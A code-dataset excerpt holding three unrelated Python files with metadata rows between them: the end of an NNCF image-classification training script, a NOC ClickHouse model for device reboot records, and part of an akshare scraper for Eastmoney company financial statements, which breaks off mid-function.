model_state_dict, compression_state = extract_model_and_compression_states(resuming_checkpoint)
compression_ctrl, model = create_compressed_model(model, nncf_config, compression_state)
if model_state_dict is not None:
load_state(model, model_state_dict, is_resume=True)
if is_export_only:
export_model(compression_ctrl, config.to_onnx, config.no_strip_on_export)
logger.info(f"Saved to {config.to_onnx}")
return
model, _ = prepare_model_for_execution(model, config)
if config.distributed:
compression_ctrl.distributed()
# define optimizer
params_to_optimize = get_parameter_groups(model, config)
optimizer, lr_scheduler = make_optimizer(params_to_optimize, config)
best_acc1 = 0
# optionally resume from a checkpoint
if resuming_checkpoint_path is not None:
if "train" in config.mode:
config.start_epoch = resuming_checkpoint["epoch"]
best_acc1 = resuming_checkpoint["best_acc1"]
optimizer.load_state_dict(resuming_checkpoint["optimizer"])
logger.info(
"=> loaded checkpoint '{}' (epoch: {}, best_acc1: {:.3f})".format(
resuming_checkpoint_path, resuming_checkpoint["epoch"], best_acc1
)
)
else:
logger.info("=> loaded checkpoint '{}'".format(resuming_checkpoint_path))
log_common_mlflow_params(config)
if config.execution_mode != ExecutionMode.CPU_ONLY:
cudnn.benchmark = True
if is_main_process():
statistics = compression_ctrl.statistics()
logger.info(statistics.to_str())
if "train" in config.mode:
if is_accuracy_aware_training(config):
# validation function that returns the target metric value
# pylint: disable=E1123
def validate_fn(model, epoch):
top1, _, _ = validate(val_loader, model, criterion, config, epoch=epoch)
return top1
# training function that trains the model for one epoch (full training dataset pass)
# it is assumed that all the NNCF-related methods are properly called inside of
# this function (like e.g. the step and epoch_step methods of the compression scheduler)
def train_epoch_fn(compression_ctrl, model, epoch, optimizer, **kwargs):
return train_epoch(
train_loader, model, criterion, train_criterion_fn, optimizer, compression_ctrl, epoch, config
)
# function that initializes optimizers & lr schedulers to start training
def configure_optimizers_fn():
params_to_optimize = get_parameter_groups(model, config)
optimizer, lr_scheduler = make_optimizer(params_to_optimize, config)
return optimizer, lr_scheduler
acc_aware_training_loop = create_accuracy_aware_training_loop(
nncf_config, compression_ctrl, uncompressed_model_accuracy
)
model = acc_aware_training_loop.run(
model,
train_epoch_fn=train_epoch_fn,
validate_fn=validate_fn,
configure_optimizers_fn=configure_optimizers_fn,
tensorboard_writer=config.tb,
log_dir=config.log_dir,
)
logger.info(f"Compressed model statistics:\n{acc_aware_training_loop.statistics.to_str()}")
else:
train(
config,
compression_ctrl,
model,
criterion,
train_criterion_fn,
lr_scheduler,
model_name,
optimizer,
train_loader,
train_sampler,
val_loader,
best_acc1,
)
if "test" in config.mode:
val_model = model
validate(val_loader, val_model, criterion, config)
config.mlflow.end_run()
if "export" in config.mode:
export_model(compression_ctrl, config.to_onnx, config.no_strip_on_export)
logger.info(f"Saved to {config.to_onnx}")
def train(
config,
compression_ctrl,
model,
criterion,
criterion_fn,
lr_scheduler,
model_name,
optimizer,
train_loader,
train_sampler,
val_loader,
best_acc1=0,
):
best_compression_stage = CompressionStage.UNCOMPRESSED
for epoch in range(config.start_epoch, config.epochs):
# update compression scheduler state at the begin of the epoch
compression_ctrl.scheduler.epoch_step()
if config.distributed:
train_sampler.set_epoch(epoch)
# train for one epoch
train_epoch(train_loader, model, criterion, criterion_fn, optimizer, compression_ctrl, epoch, config)
# Learning rate scheduling should be applied after optimizer’s update
lr_scheduler.step(epoch if not isinstance(lr_scheduler, ReduceLROnPlateau) else best_acc1)
# compute compression algo statistics
statistics = compression_ctrl.statistics()
acc1 = best_acc1
if epoch % config.test_every_n_epochs == 0:
# evaluate on validation set
acc1, _, _ = validate(val_loader, model, criterion, config, epoch=epoch)
compression_stage = compression_ctrl.compression_stage()
# remember best acc@1, considering compression stage. If current acc@1 less then the best acc@1, checkpoint
# still can be best if current compression stage is larger than the best one. Compression stages in ascending
# order: UNCOMPRESSED, PARTIALLY_COMPRESSED, FULLY_COMPRESSED.
is_best_by_accuracy = acc1 > best_acc1 and compression_stage == best_compression_stage
is_best = is_best_by_accuracy or compression_stage > best_compression_stage
if is_best:
best_acc1 = acc1
config.mlflow.safe_call("log_metric", "best_acc1", best_acc1)
best_compression_stage = max(compression_stage, best_compression_stage)
acc = best_acc1 / 100
if config.metrics_dump is not None:
write_metrics(acc, config.metrics_dump)
if is_main_process():
logger.info(statistics.to_str())
checkpoint_path = osp.join(config.checkpoint_save_dir, get_run_name(config) + "_last.pth")
checkpoint = {
"epoch": epoch + 1,
"arch": model_name,
MODEL_STATE_ATTR: model.state_dict(),
COMPRESSION_STATE_ATTR: compression_ctrl.get_compression_state(),
"best_acc1": best_acc1,
"acc1": acc1,
"optimizer": optimizer.state_dict(),
}
torch.save(checkpoint, checkpoint_path)
make_additional_checkpoints(checkpoint_path, is_best, epoch + 1, config)
for key, value in prepare_for_tensorboard(statistics).items():
config.mlflow.safe_call("log_metric", "compression/statistics/{0}".format(key), value, epoch)
config.tb.add_scalar("compression/statistics/{0}".format(key), value, len(train_loader) * epoch)
def get_dataset(dataset_config, config, transform, is_train):
if dataset_config == "imagenet":
prefix = "train" if is_train else "val"
return datasets.ImageFolder(osp.join(config.dataset_dir, prefix), transform)
# For testing purposes
num_images = config.get("num_mock_images", 1000)
if dataset_config == "mock_32x32":
return MockDataset(img_size=(32, 32), transform=transform, num_images=num_images)
if dataset_config == "mock_299x299":
return MockDataset(img_size=(299, 299), transform=transform, num_images=num_images)
return create_cifar(config, dataset_config, is_train, transform)
def create_cifar(config, dataset_config, is_train, transform):
create_cifar_fn = None
if dataset_config in ["cifar100", "cifar100_224x224"]:
create_cifar_fn = partial(CIFAR100, config.dataset_dir, train=is_train, transform=transform)
if dataset_config == "cifar10":
create_cifar_fn = partial(CIFAR10, config.dataset_dir, train=is_train, transform=transform)
if create_cifar_fn:
return safe_thread_call(partial(create_cifar_fn, download=True), partial(create_cifar_fn, download=False))
return None
def create_datasets(config):
dataset_config = config.dataset if config.dataset is not None else "imagenet"
dataset_config = dataset_config.lower()
assert dataset_config in [
"imagenet",
"cifar100",
"cifar10",
"cifar100_224x224",
"mock_32x32",
"mock_299x299",
], "Unknown dataset option"
if dataset_config == "imagenet":
normalize = transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))
elif dataset_config in ["cifar100", "cifar100_224x224"]:
normalize = transforms.Normalize(mean=(0.5071, 0.4865, 0.4409), std=(0.2673, 0.2564, 0.2761))
elif dataset_config == "cifar10":
normalize = transforms.Normalize(mean=(0.4914, 0.4822, 0.4465), std=(0.2471, 0.2435, 0.2616))
elif dataset_config in ["mock_32x32", "mock_299x299"]:
normalize = transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))
input_info_list = create_input_infos(config)
image_size = input_info_list[0].shape[-1]
size = int(image_size / 0.875)
if dataset_config in ["cifar10", "cifar100_224x224", "cifar100"]:
list_val_transforms = [transforms.ToTensor(), normalize]
if dataset_config == "cifar100_224x224":
list_val_transforms.insert(0, transforms.Resize(image_size))
val_transform = transforms.Compose(list_val_transforms)
list_train_transforms = [
transforms.RandomCrop(image_size, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]
if dataset_config == "cifar100_224x224":
list_train_transforms.insert(0, transforms.Resize(image_size))
train_transforms = transforms.Compose(list_train_transforms)
elif dataset_config in ["mock_32x32", "mock_299x299"]:
val_transform = transforms.Compose(
[
transforms.Resize(size),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
]
)
train_transforms = transforms.Compose(
[
transforms.Resize(size),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
]
)
else:
val_transform = transforms.Compose(
[
transforms.Resize(size),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
]
)
train_transforms = transforms.Compose(
[
transforms.RandomResizedCrop(image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]
)
val_dataset = get_dataset(dataset_config, config, val_transform, is_train=False)
train_dataset = get_dataset(dataset_config, config, train_transforms, is_train=True)
return train_dataset, val_dataset
def create_data_loaders(config, train_dataset, val_dataset):
pin_memory = config.execution_mode != ExecutionMode.CPU_ONLY
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
batch_size = int(config.batch_size)
workers = int(config.workers)
batch_size_val = int(config.batch_size_val) if config.batch_size_val is not None else int(config.batch_size)
if config.execution_mode == ExecutionMode.MULTIPROCESSING_DISTRIBUTED:
batch_size //= config.ngpus_per_node
batch_size_val //= config.ngpus_per_node
workers //= config.ngpus_per_node
val_sampler = torch.utils.data.SequentialSampler(val_dataset)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size_val,
shuffle=False,
num_workers=workers,
pin_memory=pin_memory,
sampler=val_sampler,
drop_last=False,
)
train_sampler = None
if config.distributed:
sampler_seed = 0 if config.seed is None else config.seed
dist_sampler_shuffle = config.seed is None
train_sampler = torch.utils.data.distributed.DistributedSampler(
train_dataset, seed=sampler_seed, shuffle=dist_sampler_shuffle
)
train_shuffle = train_sampler is None and config.seed is None
def create_train_data_loader(batch_size_):
return torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size_,
shuffle=train_shuffle,
num_workers=workers,
pin_memory=pin_memory,
sampler=train_sampler,
drop_last=True,
)
train_loader = create_train_data_loader(batch_size)
if config.batch_size_init:
init_loader = create_train_data_loader(config.batch_size_init)
else:
init_loader = deepcopy(train_loader)
return train_loader, train_sampler, val_loader, init_loader
def train_epoch(
train_loader,
model,
criterion,
criterion_fn,
optimizer,
compression_ctrl,
epoch,
config,
train_iters=None,
log_training_info=True,
):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
compression_losses = AverageMeter()
criterion_losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
if train_iters is None:
train_iters = len(train_loader)
compression_scheduler = compression_ctrl.scheduler
casting = autocast if config.mixed_precision else NullContextManager
# switch to train mode
model.train()
end = time.time()
for i, (input_, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
compression_scheduler.step()
input_ = input_.to(config.device)
target = target.to(config.device)
# compute output
with casting():
output = model(input_)
criterion_loss = criterion_fn(output, target, criterion)
# compute compression loss
compression_loss = compression_ctrl.loss()
loss = criterion_loss + compression_loss
if isinstance(output, InceptionOutputs):
output = output.logits
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input_.size(0))
comp_loss_val = compression_loss.item() if isinstance(compression_loss, torch.Tensor) else compression_loss
compression_losses.update(comp_loss_val, input_.size(0))
criterion_losses.update(criterion_loss.item(), input_.size(0))
top1.update(acc1, input_.size(0))
top5.update(acc5, input_.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % config.print_freq == 0 and log_training_info:
logger.info(
"{rank}: "
"Epoch: [{0}][{1}/{2}] "
"Lr: {3:.3} "
"Time: {batch_time.val:.3f} ({batch_time.avg:.3f}) "
"Data: {data_time.val:.3f} ({data_time.avg:.3f}) "
"CE_loss: {ce_loss.val:.4f} ({ce_loss.avg:.4f}) "
"CR_loss: {cr_loss.val:.4f} ({cr_loss.avg:.4f}) "
"Loss: {loss.val:.4f} ({loss.avg:.4f}) "
"Acc@1: {top1.val:.3f} ({top1.avg:.3f}) "
"Acc@5: {top5.val:.3f} ({top5.avg:.3f})".format(
epoch,
i,
len(train_loader),
get_lr(optimizer),
batch_time=batch_time,
data_time=data_time,
ce_loss=criterion_losses,
cr_loss=compression_losses,
loss=losses,
top1=top1,
top5=top5,
rank="{}:".format(config.rank) if config.multiprocessing_distributed else "",
)
)
if is_main_process() and log_training_info:
global_step = train_iters * epoch
config.tb.add_scalar("train/learning_rate", get_lr(optimizer), i + global_step)
config.tb.add_scalar("train/criterion_loss", criterion_losses.val, i + global_step)
config.tb.add_scalar("train/compression_loss", compression_losses.val, i + global_step)
config.tb.add_scalar("train/loss", losses.val, i + global_step)
config.tb.add_scalar("train/top1", top1.val, i + global_step)
config.tb.add_scalar("train/top5", top5.val, i + global_step)
statistics = compression_ctrl.statistics(quickly_collected_only=True)
for stat_name, stat_value in prepare_for_tensorboard(statistics).items():
config.tb.add_scalar("train/statistics/{}".format(stat_name), stat_value, i + global_step)
if i >= train_iters:
break
def validate(val_loader, model, criterion, config, epoch=0, log_validation_info=True):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
# switch to evaluate mode
model.eval()
casting = autocast if config.mixed_precision else NullContextManager
with torch.no_grad():
end = time.time()
for i, (input_, target) in enumerate(val_loader):
input_ = input_.to(config.device)
target = target.to(config.device)
# compute output
with casting():
output = model(input_)
loss = default_criterion_fn(output, target, criterion)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), input_.size(0))
top1.update(acc1, input_.size(0))
top5.update(acc5, input_.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % config.print_freq == 0 and log_validation_info:
logger.info(
"{rank}"
"Test: [{0}/{1}] "
"Time: {batch_time.val:.3f} ({batch_time.avg:.3f}) "
"Loss: {loss.val:.4f} ({loss.avg:.4f}) "
"Acc@1: {top1.val:.3f} ({top1.avg:.3f}) "
"Acc@5: {top5.val:.3f} ({top5.avg:.3f})".format(
i,
len(val_loader),
batch_time=batch_time,
loss=losses,
top1=top1,
top5=top5,
rank="{}:".format(config.rank) if config.multiprocessing_distributed else "",
)
)
if is_main_process() and log_validation_info:
config.tb.add_scalar("val/loss", losses.avg, len(val_loader) * epoch)
config.tb.add_scalar("val/top1", top1.avg, len(val_loader) * epoch)
config.tb.add_scalar("val/top5", top5.avg, len(val_loader) * epoch)
config.mlflow.safe_call("log_metric", "val/loss", float(losses.avg), epoch)
config.mlflow.safe_call("log_metric", "val/top1", float(top1.avg), epoch)
config.mlflow.safe_call("log_metric", "val/top5", float(top5.avg), epoch)
if log_validation_info:
logger.info(" * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}\n".format(top1=top1, top5=top5))
acc = top1.avg / 100
if config.metrics_dump is not None:
write_metrics(acc, config.metrics_dump)
return top1.avg, top5.avg, losses.avg
class AverageMeter:
"""Computes and stores the average and current value"""
def __init__(self):
self.val = None
self.avg = None
self.sum = None
self.count = None
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).sum(0, keepdim=True)
res.append(correct_k.float().mul_(100.0 / batch_size).item())
return res
def get_lr(optimizer):
return optimizer.param_groups[0]["lr"]
if __name__ == "__main__":
main(sys.argv[1:])
| UTF-8 | Python | false | false | 30,918 | py | 1,665 | main.py | 873 | 0.630709 | 0.616121 | 0 | 793 | 37.986129 | 119 |
nocproject/noc | 11,063,835,788,638 | e81994eeab9846d29b19f3ff5ad1469a97ac2ea2 | 2337351b228818e41be3002bd38f68f77c2aa074 | /bi/models/reboots.py | 4478010291c1ef641e77583dd04377b38e0474ba | [
"BSD-3-Clause"
]
| permissive | https://github.com/nocproject/noc | 57d40c680a1499374463e472434f9595ed6d1374 | 6e6d71574e9b9d822bec572cc629a0ea73604a59 | refs/heads/master | 2023-08-31T01:11:33.544573 | 2023-08-30T17:31:11 | 2023-08-30T17:31:11 | 107,815,776 | 105 | 33 | BSD-3-Clause | false | 2023-07-31T07:57:45 | 2017-10-21T21:04:33 | 2023-07-18T16:58:03 | 2023-07-31T07:46:42 | 91,288 | 103 | 29 | 14 | Python | false | false | # ----------------------------------------------------------------------
# Reboots model
# ----------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# NOC modules
from noc.core.clickhouse.model import Model
from noc.core.clickhouse.fields import (
DateField,
DateTimeField,
Float64Field,
ReferenceField,
IPv4Field,
)
from noc.core.clickhouse.engines import MergeTree
from noc.core.bi.dictionaries.managedobject import ManagedObject
from noc.core.bi.dictionaries.vendor import Vendor
from noc.core.bi.dictionaries.platform import Platform
from noc.core.bi.dictionaries.version import Version
from noc.core.bi.dictionaries.profile import Profile
from noc.core.bi.dictionaries.objectprofile import ObjectProfile
from noc.core.bi.dictionaries.administrativedomain import AdministrativeDomain
from noc.core.bi.dictionaries.networksegment import NetworkSegment
from noc.core.bi.dictionaries.container import Container
from noc.core.bi.dictionaries.pool import Pool
from noc.sa.models.useraccess import UserAccess
from noc.sa.models.administrativedomain import AdministrativeDomain as AdministrativeDomainM
from noc.core.translation import ugettext as _
class Reboots(Model):
class Meta:
db_table = "reboots"
engine = MergeTree("date", ("ts", "managed_object"), primary_keys=("ts", "managed_object"))
date = DateField(description=_("Date"))
ts = DateTimeField(description=_("Created"))
last = DateTimeField(description=_("Last register"))
managed_object = ReferenceField(ManagedObject, description=_("Object Name"))
pool = ReferenceField(Pool, description=_("Pool Name"))
ip = IPv4Field(description=_("IP Address"))
profile = ReferenceField(Profile, description=_("Profile"))
object_profile = ReferenceField(ObjectProfile, description=_("Object Profile"))
vendor = ReferenceField(Vendor, description=_("Vendor Name"))
platform = ReferenceField(Platform, description=_("Platform"))
version = ReferenceField(Version, description=_("Version"))
administrative_domain = ReferenceField(AdministrativeDomain, description=_("Admin. Domain"))
segment = ReferenceField(NetworkSegment, description=_("Network Segment"))
container = ReferenceField(Container, description=_("Container"))
# Coordinates
x = Float64Field(description=_("Longitude"))
y = Float64Field(description=_("Latitude"))
@classmethod
def transform_query(cls, query, user):
if not user or user.is_superuser:
return query # No restrictions
# Get user domains
domains = UserAccess.get_domains(user)
# Resolve domains against dict
domain_ids = [x.bi_id for x in AdministrativeDomainM.objects.filter(id__in=domains)]
filter = query.get("filter", {})
dl = len(domain_ids)
if not dl:
return None
elif dl == 1:
q = {"$eq": [{"$field": "administrative_domain"}, domain_ids[0]]}
else:
q = {"$in": [{"$field": "administrative_domain"}, domain_ids]}
if filter:
query["filter"] = {"$and": [query["filter"], q]}
else:
query["filter"] = q
return query
| UTF-8 | Python | false | false | 3,339 | py | 10,368 | reboots.py | 4,525 | 0.656484 | 0.651093 | 0 | 76 | 42.934211 | 99 |
lucther/akshare | 16,363,825,398,911 | 0589c0d67b0bb192647136ec65f32950eaf726c0 | 894d085e3c19d0eb052d7fceaa668ab326e7a64b | /akshare/stock_feature/stock_three_report_em.py | e1ec3569b3839753dd0e57578230303976862245 | [
"MIT"
]
| permissive | https://github.com/lucther/akshare | cf7cf750716d9c7f118f6bb72aed11c3bb690d2b | b4fbceaa7fcb9cc26936ddb448a212468b3a02ba | refs/heads/master | 2023-09-02T01:25:53.760317 | 2023-08-22T08:48:32 | 2023-08-22T08:48:32 | 249,578,209 | 0 | 0 | null | true | 2020-03-24T00:52:30 | 2020-03-24T00:52:30 | 2020-03-23T13:49:48 | 2020-03-23T12:37:01 | 258,348 | 0 | 0 | 0 | null | false | false | # -*- coding:utf-8 -*-
# !/usr/bin/env python
"""
Date: 2023/8/22 14:20
Desc: 东方财富-股票-财务分析
"""
from functools import lru_cache
import pandas as pd
import requests
from bs4 import BeautifulSoup
from tqdm import tqdm
@lru_cache()
def _stock_balance_sheet_by_report_ctype_em(symbol: str = "SH600519") -> str:
"""
东方财富-股票-财务分析-资产负债表-按报告期-公司类型判断
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh601878#zcfzb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 东方财富-股票-财务分析-资产负债表-按报告期-公司类型判断
:rtype: str
"""
url = f"https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index"
params = {"type": "web", "code": symbol.lower()}
r = requests.get(url, params=params)
soup = BeautifulSoup(r.text, "lxml")
company_type = soup.find(attrs={"id": "hidctype"})["value"]
return company_type
def stock_balance_sheet_by_report_em(symbol: str = "SH600519") -> pd.DataFrame:
"""
东方财富-股票-财务分析-资产负债表-按报告期
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 资产负债表-按报告期
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_balance_sheet_by_yearly_em(symbol: str = "SH600036") -> pd.DataFrame:
"""
东方财富-股票-财务分析-资产负债表-按年度
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 资产负债表-按年度
:rtype: pandas.DataFrame
"""
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbDateAjaxNew"
company_type = _stock_balance_sheet_by_report_ctype_em(symbol)
params = {
"companyType": company_type,
"reportDateType": "1",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
try:
temp_df = pd.DataFrame(data_json["data"])
except:
company_type = 3
params.update({"companyType": company_type})
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/zcfzbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_profit_sheet_by_report_em(symbol: str = "SH600519") -> pd.DataFrame:
"""
东方财富-股票-财务分析-利润表-报告期
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 利润表-报告期
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "1",
"code": symbol,
"dates": item,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_profit_sheet_by_yearly_em(symbol: str = "SH600519") -> pd.DataFrame:
"""
东方财富-股票-财务分析-利润表-按年度
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 利润表-按年度
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_profit_sheet_by_quarterly_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
东方财富-股票-财务分析-利润表-按单季度
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 利润表-按单季度
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "2",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/lrbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "2",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_cash_flow_sheet_by_report_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
东方财富-股票-财务分析-现金流量表-按报告期
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 现金流量表-按报告期
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
sep_list = [",".join(need_date[i : i + 5]) for i in range(0, len(need_date), 5)]
big_df = pd.DataFrame()
for item in tqdm(sep_list, leave=False):
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "0",
"reportType": "1",
"dates": item,
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
big_df = pd.concat([big_df, temp_df], ignore_index=True)
return big_df
def stock_cash_flow_sheet_by_yearly_em(
symbol: str = "SH600519",
) -> pd.DataFrame:
"""
东方财富-股票-财务分析-现金流量表-按年度
https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/Index?type=web&code=sh600519#lrb-0
:param symbol: 股票代码; 带市场标识
:type symbol: str
:return: 现金流量表-按年度
:rtype: pandas.DataFrame
"""
company_type = _stock_balance_sheet_by_report_ctype_em(symbol=symbol)
url = "https://emweb.securities.eastmoney.com/PC_HSF10/NewFinanceAnalysis/xjllbDateAjaxNew"
params = {
"companyType": company_type,
"reportDateType": "1",
"code": symbol,
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json["data"])
temp_df["REPORT_DATE"] = pd.to_datetime(temp_df["REPORT_DATE"]).dt.date
temp_df["REPORT_DATE"] = temp_df["REPORT_DATE"].astype(str)
need_date = temp_df["REPORT_DATE"].tolist()
